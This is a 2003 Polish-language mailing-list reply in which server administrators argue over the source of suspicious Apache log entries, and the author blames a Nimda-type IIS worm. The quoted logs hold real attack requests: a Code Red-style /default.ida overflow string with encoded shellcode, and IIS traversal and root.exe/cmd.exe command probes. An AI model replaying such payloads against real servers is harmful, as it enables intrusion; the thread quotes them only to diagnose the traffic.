Tomasz Jajonek napisał w dniu nie, sty 19, 2003 at 11:25:41 CET co następuje: : Hello t0masz, : : Sunday, January 19, 2003, 1:32:55 PM, you wrote: : : >> on Sat, 18 Jan 2003 01:18:27 +0100 "Tomasz T. Ciaszczyk" <[EMAIL PROTECTED]> wrote: : >> : >> > 61.55.142.76 - - [12/Jan/2003:14:07:15 +0100] "GET : >> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a : >> HTTP/1.0" 400 328 "-" "-" : >> > 209.105.192.82 - - [12/Jan/2003:14:41:23 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" : >> > 194.27.78.23 - - [12/Jan/2003:16:22:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-" : >> > 194.27.78.23 - - [12/Jan/2003:16:22:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-" : >> > 194.27.78.23 - - [12/Jan/2003:16:22:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" : >> > 194.27.78.23 - - [12/Jan/2003:16:22:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" : >> i jeszcze coś: to chyba nie pochodzi z inetu, raczej ktoś spoofuje : : Ja mam to samo i nawet doszedlem to tego co to jest :-) Prawdopodobnie : masz siec i userow lubiacych Kazaa, eDonkeya z Mulem i ty podobnymi : smieciami. U mnie dochodzilo do paru tysiecy polaczen na Apacha na [...] : mam jeszcze czasami jakies polaczenia ale juz nie taka ilosc. Krotko : mowiac sa to smieci z programow Peer to Peer. I tutaj slonce sie mylisz.. Moja siec sklada sie z zupelnie innych klientow... I bron boze zadnych windowsow (poza jednym NT) w moim LANie nie ma.. Programow P2P tez nie ma..
W tym wypadku poprawna odpowiedz brzmiala: Nimbda (czy jak sie tam on zwal) wirus dla IIS'a. Niestety, ale userzy WinShitow nei zawsze mysla o tym ze wypada cos zabezpieczyc nawet jak im sie trabi o tym... Ciekawi mnie ile jeszcze wiekow bedzie uzywany niezabezpieczony Ajtjuk czy chociazby ten szczesny IIS. : Administrator sieci PROTONET Sam jestem adminem sieci, ale potrafie rozroznic ISP dajacego lacze (a szczegolnie na osiedlowki), od ISP hostingowego... PS2. W drugiej firmie mam wlasnie uzyszkodnikow uzywajacych P2P i jakos tam takich odwolan (o dziwo) nie mam. Kazy i inne muje dzialaja (a czemu by nie.. tylko ze z transferem 1kbps). EOT. -- Pozdrawiam, TTC .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.- .:: Tomasz T. Ciaszczyk [ ciacho<at>ciacho.pl ] >> http://ciacho.pl << .:: .:: No Love, no Peace, no Mercy .:: - Only Me, Lord War, Lady Death .:: -- TTC `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-